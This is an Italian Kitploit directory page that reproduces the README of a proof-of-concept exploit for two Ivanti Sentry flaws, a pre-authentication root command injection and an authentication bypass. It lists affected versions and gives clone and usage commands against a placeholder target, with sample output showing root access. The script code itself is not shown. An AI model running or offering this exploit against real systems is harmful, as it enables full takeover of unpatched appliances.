Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2026-10520
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Vedi Repository
4503 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🎯 CVE-2026-10520 e CVE-2026-10523 - Ivanti Sentry

Immagine ChatGPT 11 Giu 2026, 11:19:12 AM

Ivanti Sentry Critical RCE

Esecuzione Remota di Codice senza Autenticazione + Bypass dell'Autenticazione

Autore: Ashraf Zaryouh "0xBlackash"

GitHub


📌 Panoramica

Due vulnerabilità critiche che interessano Ivanti Sentry (precedentemente MobileIron Sentry):

  • CVE-2026-10520 → CVSS 10.0 - Iniezione di comandi del sistema operativo pre-autenticazione (RCE come root)
  • CVE-2026-10523 → CVSS 9.9 - Bypass dell'autenticazione

Queste falle consentono a un attaccante non autenticato di compromettere totalmente il sistema.


✨ Funzionalità

  • ✅ PoC pulito e veloce
  • ✅ Pre-autenticazione (nessuna credenziale necessaria)
Scarica lo strumento
  • ✅ Esecuzione comandi a livello root
  • ✅ Formattazione dettagliata dell'output
  • ✅ Supporto proxy
  • ✅ Modalità verbose
  • ✅ Bella interfaccia terminale

  • 🚀 Utilizzo

    root@kitploit:~
    python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
    

    Esempi

    root@kitploit:~
    # Utilizzo base
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
    
    # Modalità verbose
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
    
    # Con proxy
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
    
    # Controllo kernel
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
    

    📋 Opzioni

    ArgomentoDescrizioneObbligatorio
    --urlURL del target (es. https://target:8443)Sì
    --cmdComando da eseguireSì
    -v, --verboseAbilita output verboseNo
    --proxyProxy HTTP (host:porta)No

    🛠️ Installazione

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-10520.git
    cd CVE-2026-10520
    chmod +x CVE-2026-10520.py
    

    📷 Exploit riuscito

    Quando è vulnerabile, vedrai:

    root@kitploit:~
    
     ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
    ██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
    ██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
    ████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
    ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
     ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
      
              CVE-2026-10520 & CVE-2026-10523 PoC Exploit
              Ivanti Sentry Pre-Auth RCE + Auth Bypass
              
              Author: Ashraf Zaryouh "0xBlackash"
              GitHub: https://github.com/0xBlackash
    
    
    [+] Target is VULNERABLE!
    Command Output:
    uid=0(root) gid=0(root) groups=0(root)
    

    ⚠️ Disclaimer

    Questo strumento è solo per test di sicurezza educativi e autorizzati.
    L'uso non autorizzato contro sistemi di cui non si è proprietari è illegale.
    L'autore non si assume alcuna responsabilità per un uso improprio.


    🔧 Versioni interessate

    • Ivanti Sentry prima di 10.5.2, 10.6.2, 10.7.1

    Corretto in: 10.5.2 / 10.6.2 / 10.7.1


    📜 Riferimenti

    • Advisory ufficiale Ivanti
    • Ricerca originale di watchTowr Labs
    • Voci NVD: CVE-2026-10520, CVE-2026-10523

    Realizzato con ❤️ da Ashraf Zaryouh "0xBlackash"

    Metti una stella al repository se lo hai trovato utile! ⭐